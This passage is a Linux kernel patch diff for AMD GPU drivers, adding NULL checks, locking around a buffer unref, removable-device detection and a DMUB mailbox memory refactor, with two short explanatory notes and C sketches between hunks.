+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_bios.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_bios.c
+@@ -29,6 +29,7 @@
+ #include "amdgpu.h"
+ #include "atom.h"
+ 
++#include <linux/device.h>
+ #include <linux/pci.h>
+ #include <linux/slab.h>
+ #include <linux/acpi.h>
+@@ -289,6 +290,10 @@ static bool amdgpu_atrm_get_bios(struct amdgpu_device *adev)
+ 	if (adev->flags & AMD_IS_APU)
+ 		return false;
+ 
++	/* ATRM is for on-platform devices only */
++	if (dev_is_removable(&adev->pdev->dev))
++		return false;
++
+ 	while ((pdev = pci_get_class(PCI_CLASS_DISPLAY_VGA << 8, pdev)) != NULL) {
+ 		dhandle = ACPI_HANDLE(&pdev->dev);
+ 		if (!dhandle)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_bo_list.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_bo_list.c
+index 252a876b07258..fdc302aa59e7b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_bo_list.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_bo_list.c
+@@ -179,6 +179,7 @@ int amdgpu_bo_list_get(struct amdgpu_fpriv *fpriv, int id,
+ 	}
+ 
+ 	rcu_read_unlock();
++	*result = NULL;
+ 	return -ENOENT;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+index 4624160315648..ced4e7e8f98b5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+@@ -1391,7 +1391,7 @@ int amdgpu_cs_ioctl(struct drm_device *dev, void *data, struct drm_file *filp)
+ 		if (r == -ENOMEM)
+ 			DRM_ERROR("Not enough memory for command submission!\n");
+ 		else if (r != -ERESTARTSYS && r != -EAGAIN)
+-			DRM_ERROR("Failed to process the buffer list %d!\n", r);
++			DRM_DEBUG("Failed to process the buffer list %d!\n", r);
+ 		goto error_fini;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c
+index de61a85c4b022..fd796574f87a5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c
+@@ -589,6 +589,9 @@ static ssize_t amdgpu_debugfs_regs_smc_read(struct file *f, char __user *buf,
+ 	ssize_t result = 0;
+ 	int r;
+ 
++	if (!adev->smc_rreg)
++		return -EPERM;
++
+ 	if (size & 0x3 || *pos & 0x3)
+ 		return -EINVAL;
+ 
+@@ -645,6 +648,9 @@ static ssize_t amdgpu_debugfs_regs_smc_write(struct file *f, const char __user *
+ 	ssize_t result = 0;
+ 	int r;
+ 
++	if (!adev->smc_wreg)
++		return -EPERM;
++
+ 	if (size & 0x3 || *pos & 0x3)
+ 		return -EINVAL;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 92fa2faf63e41..8a1b84aaaf717 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -41,6 +41,7 @@
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_probe_helper.h>
+ #include <drm/amdgpu_drm.h>
++#include <linux/device.h>
+ #include <linux/vgaarb.h>
+ #include <linux/vga_switcheroo.h>
+ #include <linux/efi.h>
+@@ -2105,7 +2106,6 @@ out:
+  */
+ static int amdgpu_device_ip_early_init(struct amdgpu_device *adev)
+ {
+-	struct drm_device *dev = adev_to_drm(adev);
+ 	struct pci_dev *parent;
+ 	int i, r;
+ 
+@@ -2175,7 +2175,7 @@ static int amdgpu_device_ip_early_init(struct amdgpu_device *adev)
+ 	    (amdgpu_is_atpx_hybrid() ||
+ 	     amdgpu_has_atpx_dgpu_power_cntl()) &&
+ 	    ((adev->flags & AMD_IS_APU) == 0) &&
+-	    !pci_is_thunderbolt_attached(to_pci_dev(dev->dev)))
++	    !dev_is_removable(&adev->pdev->dev))
+ 		adev->flags |= AMD_IS_PX;
+ 
+ 	if (!(adev->flags & AMD_IS_APU)) {
+@@ -3968,7 +3968,7 @@ fence_driver_init:
+ 
+ 	px = amdgpu_device_supports_px(ddev);
+ 
+-	if (px || (!pci_is_thunderbolt_attached(adev->pdev) &&
++	if (px || (!dev_is_removable(&adev->pdev->dev) &&
+ 				apple_gmux_detect(NULL, NULL)))
+ 		vga_switcheroo_register_client(adev->pdev,
+ 					       &amdgpu_switcheroo_ops, px);
+@@ -4117,7 +4117,7 @@ void amdgpu_device_fini_sw(struct amdgpu_device *adev)
+ 
+ 	px = amdgpu_device_supports_px(adev_to_drm(adev));
+ 
+-	if (px || (!pci_is_thunderbolt_attached(adev->pdev) &&
++	if (px || (!dev_is_removable(&adev->pdev->dev) &&
+ 				apple_gmux_detect(NULL, NULL)))
+ 		vga_switcheroo_unregister_client(adev->pdev);
+ 
+@@ -5330,7 +5330,8 @@ int amdgpu_device_gpu_recover(struct amdgpu_device *adev,
+ 	 * Flush RAM to disk so that after reboot
+ 	 * the user can read log and see why the system rebooted.
+ 	 */
+-	if (need_emergency_restart && amdgpu_ras_get_context(adev)->reboot) {
++	if (need_emergency_restart && amdgpu_ras_get_context(adev) &&
++		amdgpu_ras_get_context(adev)->reboot) {
+ 		DRM_WARN("Emergency reboot.");
+ 
+ 		ksys_sync_helper();
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
+index 09fc464f5f128..9fe2eae88ec17 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c
+@@ -1273,7 +1273,8 @@ static void amdgpu_ras_sysfs_remove_bad_page_node(struct amdgpu_device *adev)
+ {
+ 	struct amdgpu_ras *con = amdgpu_ras_get_context(adev);
+ 
+-	sysfs_remove_file_from_group(&adev->dev->kobj,
++	if (adev->dev->kobj.sd)
++		sysfs_remove_file_from_group(&adev->dev->kobj,
+ 				&con->badpages_attr.attr,
+ 				RAS_FS_NAME);
+ }
+@@ -1290,7 +1291,8 @@ static int amdgpu_ras_sysfs_remove_feature_node(struct amdgpu_device *adev)
+ 		.attrs = attrs,
+ 	};
+ 
+-	sysfs_remove_group(&adev->dev->kobj, &group);
++	if (adev->dev->kobj.sd)
++		sysfs_remove_group(&adev->dev->kobj, &group);
+ 
+ 	return 0;
+ }
+@@ -1337,7 +1339,8 @@ int amdgpu_ras_sysfs_remove(struct amdgpu_device *adev,
+ 	if (!obj || !obj->attr_inuse)
+ 		return -EINVAL;
+ 
+-	sysfs_remove_file_from_group(&adev->dev->kobj,
++	if (adev->dev->kobj.sd)
++		sysfs_remove_file_from_group(&adev->dev->kobj,
+ 				&obj->sysfs_attr.attr,
+ 				RAS_FS_NAME);
+ 	obj->attr_inuse = 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
+index 5c1193dd7d88c..48e612023d0c7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
+@@ -391,8 +391,15 @@ int amdgpu_vcn_suspend(struct amdgpu_device *adev)
+ 	void *ptr;
+ 	int i, idx;
+ 
++	bool in_ras_intr = amdgpu_ras_intr_triggered();
++
+ 	cancel_delayed_work_sync(&adev->vcn.idle_work);
+ 
++	/* err_event_athub will corrupt VCPU buffer, so we need to
++	 * restore fw data and clear buffer in amdgpu_vcn_resume() */
++	if (in_ras_intr)
++		return 0;
++
+ 	for (i = 0; i < adev->vcn.num_vcn_inst; ++i) {
+ 		if (adev->vcn.harvest_config & (1 << i))
+ 			continue;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c
+index d60c4a2eeb0c5..06980b8527ff8 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c
+@@ -239,6 +239,8 @@ static int amdgpu_vkms_conn_get_modes(struct drm_connector *connector)
+ 
+ 	for (i = 0; i < ARRAY_SIZE(common_modes); i++) {
+ 		mode = drm_cvt_mode(dev, common_modes[i].w, common_modes[i].h, 60, false, false, false);
++		if (!mode)
++			continue;
+ 		drm_mode_probed_add(connector, mode);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/nbio_v2_3.c b/drivers/gpu/drm/amd/amdgpu/nbio_v2_3.c
+index 7ba47fc1917b2..73937ce8829cc 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nbio_v2_3.c
++++ b/drivers/gpu/drm/amd/amdgpu/nbio_v2_3.c
+@@ -28,6 +28,7 @@
+ #include "nbio/nbio_2_3_offset.h"
+ #include "nbio/nbio_2_3_sh_mask.h"
+ #include <uapi/linux/kfd_ioctl.h>
++#include <linux/device.h>
+ #include <linux/pci.h>
+ 
+ #define smnPCIE_CONFIG_CNTL	0x11180044
+@@ -361,7 +362,7 @@ static void nbio_v2_3_enable_aspm(struct amdgpu_device *adev,
+ 
+ 		data |= NAVI10_PCIE__LC_L0S_INACTIVITY_DEFAULT << PCIE_LC_CNTL__LC_L0S_INACTIVITY__SHIFT;
+ 
+-		if (pci_is_thunderbolt_attached(adev->pdev))
++		if (dev_is_removable(&adev->pdev->dev))
+ 			data |= NAVI10_PCIE__LC_L1_INACTIVITY_TBT_DEFAULT  << PCIE_LC_CNTL__LC_L1_INACTIVITY__SHIFT;
+ 		else
+ 			data |= NAVI10_PCIE__LC_L1_INACTIVITY_DEFAULT << PCIE_LC_CNTL__LC_L1_INACTIVITY__SHIFT;
+@@ -480,7 +481,7 @@ static void nbio_v2_3_program_aspm(struct amdgpu_device *adev)
+ 
+ 	def = data = RREG32_PCIE(smnPCIE_LC_CNTL);
+ 	data |= NAVI10_PCIE__LC_L0S_INACTIVITY_DEFAULT << PCIE_LC_CNTL__LC_L0S_INACTIVITY__SHIFT;
+-	if (pci_is_thunderbolt_attached(adev->pdev))
++	if (dev_is_removable(&adev->pdev->dev))
+ 		data |= NAVI10_PCIE__LC_L1_INACTIVITY_TBT_DEFAULT  << PCIE_LC_CNTL__LC_L1_INACTIVITY__SHIFT;
+ 	else
+ 		data |= NAVI10_PCIE__LC_L1_INACTIVITY_DEFAULT << PCIE_LC_CNTL__LC_L1_INACTIVITY__SHIFT;
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_svm.c b/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
+index d7e758c86a0b8..208812512d8a8 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
+@@ -612,8 +612,15 @@ create_bo_failed:
+ 
+ void svm_range_vram_node_free(struct svm_range *prange)
+ {
+-	svm_range_bo_unref(prange->svm_bo);
+-	prange->ttm_res = NULL;
++	/* serialize prange->svm_bo unref */
++	mutex_lock(&prange->lock);
++	/* prange->svm_bo has not been unref */
++	if (prange->ttm_res) {
++		prange->ttm_res = NULL;
++		mutex_unlock(&prange->lock);
++		svm_range_bo_unref(prange->svm_bo);
++	} else
++		mutex_unlock(&prange->lock);
+ }
+ 
+ struct amdgpu_device *
+@@ -757,7 +764,7 @@ svm_range_apply_attrs(struct kfd_process *p, struct svm_range *prange,
+ 			prange->flags &= ~attrs[i].value;
+ 			break;
+ 		case KFD_IOCTL_SVM_ATTR_GRANULARITY:
+-			prange->granularity = attrs[i].value;
++			prange->granularity = min_t(uint32_t, attrs[i].value, 0x3F);
+ 			break;
+ 		default:
+ 			WARN_ONCE(1, "svm_range_check_attrs wasn't called?");
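
Note: the svm_range_vram_node_free() change earlier in this file turns prange->ttm_res into an ownership flag guarded by prange->lock, so exactly one caller drops the svm_bo reference, and it does so after releasing the lock. A simplified userspace sketch of that claim-under-lock, release-outside-lock pattern (types and names invented for the example; build with cc -pthread):

#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>

struct range {
	pthread_mutex_t lock;
	void *res;
};

static void range_free(struct range *r)
{
	void *res;

	pthread_mutex_lock(&r->lock);
	res = r->res;		/* claim ownership, or observe NULL */
	r->res = NULL;
	pthread_mutex_unlock(&r->lock);

	free(res);		/* at most one caller sees a non-NULL res */
}

int main(void)
{
	struct range r = { PTHREAD_MUTEX_INITIALIZER, malloc(16) };

	range_free(&r);
	range_free(&r);		/* second call is a harmless no-op */
	printf("released exactly once\n");
	return 0;
}
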
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 42e266e074d1d..001932cb813dc 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -2057,7 +2057,7 @@ static int dm_dmub_sw_init(struct amdgpu_device *adev)
+ 	struct dmub_srv_create_params create_params;
+ 	struct dmub_srv_region_params region_params;
+ 	struct dmub_srv_region_info region_info;
+-	struct dmub_srv_fb_params fb_params;
++	struct dmub_srv_memory_params memory_params;
+ 	struct dmub_srv_fb_info *fb_info;
+ 	struct dmub_srv *dmub_srv;
+ 	const struct dmcub_firmware_header_v1_0 *hdr;
+@@ -2188,6 +2188,7 @@ static int dm_dmub_sw_init(struct amdgpu_device *adev)
+ 		adev->dm.dmub_fw->data +
+ 		le32_to_cpu(hdr->header.ucode_array_offset_bytes) +
+ 		PSP_HEADER_BYTES;
++	region_params.is_mailbox_in_inbox = false;
+ 
+ 	status = dmub_srv_calc_region_info(dmub_srv, &region_params,
+ 					   &region_info);
+@@ -2209,10 +2210,10 @@ static int dm_dmub_sw_init(struct amdgpu_device *adev)
+ 		return r;
+ 
+ 	/* Rebase the regions on the framebuffer address. */
+-	memset(&fb_params, 0, sizeof(fb_params));
+-	fb_params.cpu_addr = adev->dm.dmub_bo_cpu_addr;
+-	fb_params.gpu_addr = adev->dm.dmub_bo_gpu_addr;
+-	fb_params.region_info = &region_info;
++	memset(&memory_params, 0, sizeof(memory_params));
++	memory_params.cpu_fb_addr = adev->dm.dmub_bo_cpu_addr;
++	memory_params.gpu_fb_addr = adev->dm.dmub_bo_gpu_addr;
++	memory_params.region_info = &region_info;
+ 
+ 	adev->dm.dmub_fb_info =
+ 		kzalloc(sizeof(*adev->dm.dmub_fb_info), GFP_KERNEL);
+@@ -2224,7 +2225,7 @@ static int dm_dmub_sw_init(struct amdgpu_device *adev)
+ 		return -ENOMEM;
+ 	}
+ 
+-	status = dmub_srv_calc_fb_info(dmub_srv, &fb_params, fb_info);
++	status = dmub_srv_calc_mem_info(dmub_srv, &memory_params, fb_info);
+ 	if (status != DMUB_STATUS_OK) {
+ 		DRM_ERROR("Error calculating DMUB FB info: %d\n", status);
+ 		return -EINVAL;
+@@ -7219,6 +7220,9 @@ static int amdgpu_dm_i2c_xfer(struct i2c_adapter *i2c_adap,
+ 	int i;
+ 	int result = -EIO;
+ 
++	if (!ddc_service->ddc_pin || !ddc_service->ddc_pin->hw_info.hw_supported)
++		return result;
++
+ 	cmd.payloads = kcalloc(num, sizeof(struct i2c_payload), GFP_KERNEL);
+ 
+ 	if (!cmd.payloads)
+@@ -9282,14 +9286,14 @@ static bool should_reset_plane(struct drm_atomic_state *state,
+ 	struct drm_plane *other;
+ 	struct drm_plane_state *old_other_state, *new_other_state;
+ 	struct drm_crtc_state *new_crtc_state;
++	struct amdgpu_device *adev = drm_to_adev(plane->dev);
+ 	int i;
+ 
+ 	/*
+-	 * TODO: Remove this hack once the checks below are sufficient
+-	 * enough to determine when we need to reset all the planes on
+-	 * the stream.
++	 * TODO: Remove this hack for all asics once it proves that the
++	 * fast updates works fine on DCN3.2+.
+ 	 */
+-	if (state->allow_modeset)
++	if (adev->ip_versions[DCE_HWIP][0] < IP_VERSION(3, 2, 0) && state->allow_modeset)
+ 		return true;
+ 
+ 	/* Exit early if we know that we're adding or removing the plane. */
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index 15d3caf3d6d72..7a309547c2b3f 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -996,7 +996,8 @@ static bool dc_construct(struct dc *dc,
+ 	/* set i2c speed if not done by the respective dcnxxx__resource.c */
+ 	if (dc->caps.i2c_speed_in_khz_hdcp == 0)
+ 		dc->caps.i2c_speed_in_khz_hdcp = dc->caps.i2c_speed_in_khz;
+-
++	if (dc->caps.max_optimizable_video_width == 0)
++		dc->caps.max_optimizable_video_width = 5120;
+ 	dc->clk_mgr = dc_clk_mgr_create(dc->ctx, dc->res_pool->pp_smu, dc->res_pool->dccg);
+ 	if (!dc->clk_mgr)
+ 		goto fail;
+@@ -1805,7 +1806,7 @@ static enum dc_status dc_commit_state_no_check(struct dc *dc, struct dc_state *c
+ 	if (dc->hwss.subvp_pipe_control_lock)
+ 		dc->hwss.subvp_pipe_control_lock(dc, context, true, true, NULL, subvp_prev_use);
+ 
+-	if (dc->debug.enable_double_buffered_dsc_pg_support)
++	if (dc->hwss.update_dsc_pg)
+ 		dc->hwss.update_dsc_pg(dc, context, false);
+ 
+ 	disable_dangling_plane(dc, context);
+@@ -1904,7 +1905,7 @@ static enum dc_status dc_commit_state_no_check(struct dc *dc, struct dc_state *c
+ 		dc->hwss.optimize_bandwidth(dc, context);
+ 	}
+ 
+-	if (dc->debug.enable_double_buffered_dsc_pg_support)
++	if (dc->hwss.update_dsc_pg)
+ 		dc->hwss.update_dsc_pg(dc, context, true);
+ 
+ 	if (dc->ctx->dce_version >= DCE_VERSION_MAX)
+@@ -2192,7 +2193,7 @@ void dc_post_update_surfaces_to_stream(struct dc *dc)
+ 
+ 		dc->hwss.optimize_bandwidth(dc, context);
+ 
+-		if (dc->debug.enable_double_buffered_dsc_pg_support)
++		if (dc->hwss.update_dsc_pg)
+ 			dc->hwss.update_dsc_pg(dc, context, true);
+ 	}
+ 
+@@ -2438,6 +2439,7 @@ static enum surface_update_type get_plane_info_update_type(const struct dc_surfa
+ }
+ 
+ static enum surface_update_type get_scaling_info_update_type(
++		const struct dc *dc,
+ 		const struct dc_surface_update *u)
+ {
+ 	union surface_update_flags *update_flags = &u->surface->update_flags;
+@@ -2472,6 +2474,12 @@ static enum surface_update_type get_scaling_info_update_type(
+ 			update_flags->bits.clock_change = 1;
+ 	}
+ 
++	if (u->scaling_info->src_rect.width > dc->caps.max_optimizable_video_width &&
++		(u->scaling_info->clip_rect.width > u->surface->clip_rect.width ||
++		 u->scaling_info->clip_rect.height > u->surface->clip_rect.height))
++		 /* Changing clip size of a large surface may result in MPC slice count change */
++		update_flags->bits.bandwidth_change = 1;
++
+ 	if (u->scaling_info->src_rect.x != u->surface->src_rect.x
+ 			|| u->scaling_info->src_rect.y != u->surface->src_rect.y
+ 			|| u->scaling_info->clip_rect.x != u->surface->clip_rect.x
+@@ -2509,7 +2517,7 @@ static enum surface_update_type det_surface_update(const struct dc *dc,
+ 	type = get_plane_info_update_type(u);
+ 	elevate_update_type(&overall_type, type);
+ 
+-	type = get_scaling_info_update_type(u);
++	type = get_scaling_info_update_type(dc, u);
+ 	elevate_update_type(&overall_type, type);
+ 
+ 	if (u->flip_addr) {
+@@ -3445,7 +3453,7 @@ static void commit_planes_for_stream(struct dc *dc,
+ 		if (get_seamless_boot_stream_count(context) == 0)
+ 			dc->hwss.prepare_bandwidth(dc, context);
+ 
+-		if (dc->debug.enable_double_buffered_dsc_pg_support)
++		if (dc->hwss.update_dsc_pg)
+ 			dc->hwss.update_dsc_pg(dc, context, false);
+ 
+ 		context_clock_trace(dc, context);
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_stream.c b/drivers/gpu/drm/amd/display/dc/core/dc_stream.c
+index 38d71b5c1f2d5..556c57c390ffd 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_stream.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_stream.c
+@@ -567,7 +567,7 @@ uint32_t dc_stream_get_vblank_counter(const struct dc_stream_state *stream)
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		struct timing_generator *tg = res_ctx->pipe_ctx[i].stream_res.tg;
+ 
+-		if (res_ctx->pipe_ctx[i].stream != stream)
++		if (res_ctx->pipe_ctx[i].stream != stream || !tg)
+ 			continue;
+ 
+ 		return tg->funcs->get_frame_count(tg);
+@@ -626,7 +626,7 @@ bool dc_stream_get_scanoutpos(const struct dc_stream_state *stream,
+ 	for (i = 0; i < MAX_PIPES; i++) {
+ 		struct timing_generator *tg = res_ctx->pipe_ctx[i].stream_res.tg;
+ 
+-		if (res_ctx->pipe_ctx[i].stream != stream)
++		if (res_ctx->pipe_ctx[i].stream != stream || !tg)
+ 			continue;
+ 
+ 		tg->funcs->get_scanoutpos(tg,
+diff --git a/drivers/gpu/drm/amd/display/dc/dc.h b/drivers/gpu/drm/amd/display/dc/dc.h
+index a4540f83aae59..f773a467fef54 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc.h
++++ b/drivers/gpu/drm/amd/display/dc/dc.h
+@@ -230,6 +230,11 @@ struct dc_caps {
+ 	uint32_t dmdata_alloc_size;
+ 	unsigned int max_cursor_size;
+ 	unsigned int max_video_width;
++	/*
++	 * max video plane width that can be safely assumed to be always
++	 * supported by single DPP pipe.
++	 */
++	unsigned int max_optimizable_video_width;
+ 	unsigned int min_horizontal_blanking_period;
+ 	int linear_pitch_alignment;
+ 	bool dcc_const_color;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+index d477dcc9149fa..50b3547977281 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+@@ -79,6 +79,9 @@ void dcn32_dsc_pg_control(
+ 	if (hws->ctx->dc->debug.disable_dsc_power_gate)
+ 		return;
+ 
++	if (!hws->ctx->dc->debug.enable_double_buffered_dsc_pg_support)
++		return;
++
+ 	REG_GET(DC_IP_REQUEST_CNTL, IP_REQUEST_EN, &org_ip_request_cntl);
+ 	if (org_ip_request_cntl == 0)
+ 		REG_SET(DC_IP_REQUEST_CNTL, 0, IP_REQUEST_EN, 1);
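
Note: the dc.c hunks earlier replace a debug-flag test at every call site with a check of the optional hook itself (dc->hwss.update_dsc_pg), while dcn32_dsc_pg_control() above keeps the enable_double_buffered_dsc_pg_support policy in one place. A minimal sketch of that optional-callback pattern (struct and function names are illustrative):

#include <stdio.h>

struct hw_ops {
	void (*update_dsc_pg)(int enable);	/* optional: may be NULL */
};

static void dcn32_style_update_dsc_pg(int enable)
{
	printf("DSC power gating %s\n", enable ? "enabled" : "disabled");
}

int main(void)
{
	struct hw_ops with_hook = { dcn32_style_update_dsc_pg };
	struct hw_ops without_hook = { 0 };

	/* Call sites gate on the hook, not on a config flag. */
	if (with_hook.update_dsc_pg)
		with_hook.update_dsc_pg(1);
	if (without_hook.update_dsc_pg)		/* silently skipped */
		without_hook.update_dsc_pg(1);
	return 0;
}
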
+diff --git a/drivers/gpu/drm/amd/display/dmub/dmub_srv.h b/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
+index 5f17b252e9be4..a21fe7b037d1f 100644
+--- a/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
++++ b/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
+@@ -174,6 +174,7 @@ struct dmub_srv_region_params {
+ 	uint32_t vbios_size;
+ 	const uint8_t *fw_inst_const;
+ 	const uint8_t *fw_bss_data;
++	bool is_mailbox_in_inbox;
+ };
+ 
+ /**
+@@ -193,20 +194,25 @@ struct dmub_srv_region_params {
+  */
+ struct dmub_srv_region_info {
+ 	uint32_t fb_size;
++	uint32_t inbox_size;
+ 	uint8_t num_regions;
+ 	struct dmub_region regions[DMUB_WINDOW_TOTAL];
+ };
+ 
+ /**
+- * struct dmub_srv_fb_params - parameters used for driver fb setup
++ * struct dmub_srv_memory_params - parameters used for driver fb setup
+  * @region_info: region info calculated by dmub service
+- * @cpu_addr: base cpu address for the framebuffer
+- * @gpu_addr: base gpu virtual address for the framebuffer
++ * @cpu_fb_addr: base cpu address for the framebuffer
++ * @cpu_inbox_addr: base cpu address for the gart
++ * @gpu_fb_addr: base gpu virtual address for the framebuffer
++ * @gpu_inbox_addr: base gpu virtual address for the gart
+  */
+-struct dmub_srv_fb_params {
++struct dmub_srv_memory_params {
+ 	const struct dmub_srv_region_info *region_info;
+-	void *cpu_addr;
+-	uint64_t gpu_addr;
++	void *cpu_fb_addr;
++	void *cpu_inbox_addr;
++	uint64_t gpu_fb_addr;
++	uint64_t gpu_inbox_addr;
+ };
+ 
+ /**
+@@ -524,8 +530,8 @@ dmub_srv_calc_region_info(struct dmub_srv *dmub,
+  *   DMUB_STATUS_OK - success
+  *   DMUB_STATUS_INVALID - unspecified error
+  */
+-enum dmub_status dmub_srv_calc_fb_info(struct dmub_srv *dmub,
+-				       const struct dmub_srv_fb_params *params,
++enum dmub_status dmub_srv_calc_mem_info(struct dmub_srv *dmub,
++				       const struct dmub_srv_memory_params *params,
+ 				       struct dmub_srv_fb_info *out);
+ 
+ /**
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
+index 0dab22d794808..c3327875933e9 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
+@@ -384,7 +384,7 @@ dmub_srv_calc_region_info(struct dmub_srv *dmub,
+ 	uint32_t fw_state_size = DMUB_FW_STATE_SIZE;
+ 	uint32_t trace_buffer_size = DMUB_TRACE_BUFFER_SIZE;
+ 	uint32_t scratch_mem_size = DMUB_SCRATCH_MEM_SIZE;
+-
++	uint32_t previous_top = 0;
+ 	if (!dmub->sw_init)
+ 		return DMUB_STATUS_INVALID;
+ 
+@@ -409,8 +409,15 @@ dmub_srv_calc_region_info(struct dmub_srv *dmub,
+ 	bios->base = dmub_align(stack->top, 256);
+ 	bios->top = bios->base + params->vbios_size;
+ 
+-	mail->base = dmub_align(bios->top, 256);
+-	mail->top = mail->base + DMUB_MAILBOX_SIZE;
++	if (params->is_mailbox_in_inbox) {
++		mail->base = 0;
++		mail->top = mail->base + DMUB_MAILBOX_SIZE;
++		previous_top = bios->top;
++	} else {
++		mail->base = dmub_align(bios->top, 256);
++		mail->top = mail->base + DMUB_MAILBOX_SIZE;
++		previous_top = mail->top;
++	}
+ 
+ 	fw_info = dmub_get_fw_meta_info(params);
+ 
+@@ -429,7 +436,7 @@ dmub_srv_calc_region_info(struct dmub_srv *dmub,
+ 			dmub->fw_version = fw_info->fw_version;
+ 	}
+ 
+-	trace_buff->base = dmub_align(mail->top, 256);
++	trace_buff->base = dmub_align(previous_top, 256);
+ 	trace_buff->top = trace_buff->base + dmub_align(trace_buffer_size, 64);
+ 
+ 	fw_state->base = dmub_align(trace_buff->top, 256);
+@@ -440,11 +447,14 @@ dmub_srv_calc_region_info(struct dmub_srv *dmub,
+ 
+ 	out->fb_size = dmub_align(scratch_mem->top, 4096);
+ 
++	if (params->is_mailbox_in_inbox)
++		out->inbox_size = dmub_align(mail->top, 4096);
++
+ 	return DMUB_STATUS_OK;
+ }
+ 
+-enum dmub_status dmub_srv_calc_fb_info(struct dmub_srv *dmub,
+-				       const struct dmub_srv_fb_params *params,
++enum dmub_status dmub_srv_calc_mem_info(struct dmub_srv *dmub,
++				       const struct dmub_srv_memory_params *params,
+ 				       struct dmub_srv_fb_info *out)
+ {
+ 	uint8_t *cpu_base;
+@@ -459,8 +469,8 @@ enum dmub_status dmub_srv_calc_fb_info(struct dmub_srv *dmub,
+ 	if (params->region_info->num_regions != DMUB_NUM_WINDOWS)
+ 		return DMUB_STATUS_INVALID;
+ 
+-	cpu_base = (uint8_t *)params->cpu_addr;
+-	gpu_base = params->gpu_addr;
++	cpu_base = (uint8_t *)params->cpu_fb_addr;
++	gpu_base = params->gpu_fb_addr;
+ 
+ 	for (i = 0; i < DMUB_NUM_WINDOWS; ++i) {
+ 		const struct dmub_region *reg =
+@@ -468,6 +478,12 @@ enum dmub_status dmub_srv_calc_fb_info(struct dmub_srv *dmub,
+ 
+ 		out->fb[i].cpu_addr = cpu_base + reg->base;
+ 		out->fb[i].gpu_addr = gpu_base + reg->base;
++
++		if (i == DMUB_WINDOW_4_MAILBOX && params->cpu_inbox_addr != 0) {
++			out->fb[i].cpu_addr = (uint8_t *)params->cpu_inbox_addr + reg->base;
++			out->fb[i].gpu_addr = params->gpu_inbox_addr + reg->base;
++		}
++
+ 		out->fb[i].size = reg->top - reg->base;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/include/pptable.h b/drivers/gpu/drm/amd/include/pptable.h
+index 0b6a057e0a4c4..5aac8d545bdc6 100644
+--- a/drivers/gpu/drm/amd/include/pptable.h
++++ b/drivers/gpu/drm/amd/include/pptable.h
+@@ -78,7 +78,7 @@ typedef struct _ATOM_PPLIB_THERMALCONTROLLER
